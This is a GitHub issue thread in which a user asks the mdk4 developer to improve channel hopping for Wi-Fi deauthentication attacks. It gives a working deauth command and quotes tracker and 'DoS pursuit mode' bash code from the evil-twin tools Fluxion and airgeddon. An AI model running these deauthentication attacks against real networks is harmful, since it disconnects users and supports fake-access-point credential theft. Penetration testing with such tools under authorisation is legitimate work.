The channel hopping option needs to be rewritten
Opened this issue · 3 comments
Mdk4 wlan0 d -B mac -c 10
Works just great when specifying the channel
but without specifying it , the deauth barely works , it almost like it's not running
So i am suggesting , why wouldn't there be an argument , when used it does the channel hopping this Way
- MDK4 searches for the target mac channel
- after finding it , it starts deauth
- Runs something like airodump-ng on target AP with the channel it already found , to monitor for channel change
- Then if airodump-ng can no longer detect/find the AP on that channel then it starts looking for the AP on other channels
- And after finding the new channel , It restarts mdk4 with the new channel provided to it as an argument
- then airodump-ng starts monitoring the target on that channel again , to look for possible channel change
That way MDK4 won't need to be hopping channels all the time disrupting the deauth making it very very inefficient
Fluxion too the oldest known & forked evil twin tool , does channel hopping only with two adapters and instead of one running deauth and one running FAKE AP
They made one adapter run BOTH while the second look and monitor for AP channel change then provide mdk with the new channel if changed , They obviously did it this way because they Found it not performing as it should through tests when used the built in channel hopping way
fluxion_target_tracker_daemon() {timeout --preserve-status $monitorTimeout airodump-ng -aw "$capturePath" \
-d "$FluxionTargetMAC" $FluxionTargetTrackerInterface &> /dev/null
if [ "$targetChannel" -ne "$FluxionTargetChannel" ]; then
echo "[T-Tracker] Target channel change detected!"
FluxionTargetChannel=$targetChannel
break
echo "$FluxionTargetChannel" >> "$FLUXIONWorkspacePath/target_info.txt"
And Another famous tool like airgeddon Created channel hopping in another method using mdk because they found it very inefficient too
Even that they ran mdk on one adapter and fake AP on another , they still didn't use the regular mdk channel hopping
while hopping, the DoS is not effective , but when it hits the right channel it is deauthing again for a while. then the client could reconnect, but is disconnected again in some seconds when the hopping hits the channel again
${mdk_command} ${interface_pursuit_mode_deauth} d -b ${tmpdir}bl.txt -c ${channel}" "${1} (DoS Pursuit mode)"
sleep ${dos_delay}
airodump-ng -w "${tmpdir}dos_pm" "${interface_pursuit_mode_scan}" --band "${airodump_band_modifier}" > /dev/null 2>&1 &
dos_pursuit_mode_scan_pid=$!
dos_pursuit_mode_pids+=("${dos_pursuit_mode_scan_pid}")
pid_control_pursuit_mode() {
if [[ -n "${2}" ]] && [[ "${2}" = "evil_twin" ]]; then
rm -rf "${tmpdir}${channelfile}" > /dev/null 2>&1
echo "${channel}" > "${tmpdir}${channelfile}"
fi
while true; do
sleep 5
if grep "${bssid}" "${tmpdir}dos_pm-01.csv" > /dev/null 2>&1; then
readarray -t DOS_PM_LINES_TO_PARSE < <(cat < "${tmpdir}dos_pm-01.csv" 2> /dev/null)
for item in "${DOS_PM_LINES_TO_PARSE[@]}"; do
if [[ "${item}" =~ ${bssid} ]]; then
dos_pm_current_channel=$(echo "${item}" | awk -F "," '{print $4}' | sed 's/^[ ^t]*//')
if [[ "${dos_pm_current_channel}" =~ ^([0-9]+)$ ]] && [[ "${BASH_REMATCH[1]}" -ne 0 ]] && [[ "${BASH_REMATCH[1]}" -ne "${channel}" ]]; then
channel="${dos_pm_current_channel}"
if [[ -n "${2}" ]] && [[ "${2}" = "evil_twin" ]]; then
rm -rf "${tmpdir}${channelfile}" > /dev/null 2>&1
echo "${channel}" > "${tmpdir}${channelfile}"
fi
kill_dos_pursuit_mode_processes
dos_pursuit_mode_pids=()
launch_dos_pursuit_mode_attack "${1}" "relaunch"
I been struggling with this problem for years , but i noticed that others did too , and have came up with cleaver fixes to the problem
So i thought why don't i got to the root of the problem , And maybe it would be fixed from there and That would the Real Win
Thanks a lot , and Hope you are doing great
Ps. it's not my first feature suggestion here ,
Hope this gets accepted as the others
Regards
Thank a lot for your suggestion. The efficiency problem of channel frequency hopping does exist, which is why I haven't added the automatic frequency hopping of 5G. I will seriously consider your suggestion and improve the efficiency of this feature.
I will seriously consider your suggestion and improve the efficiency of this feature.
@E7mer Thanks a lot for your work mate
You are doing a great work : )
I will seriously consider your suggestion and improve the efficiency of this feature.
Did you pushed out patches for that since this convo?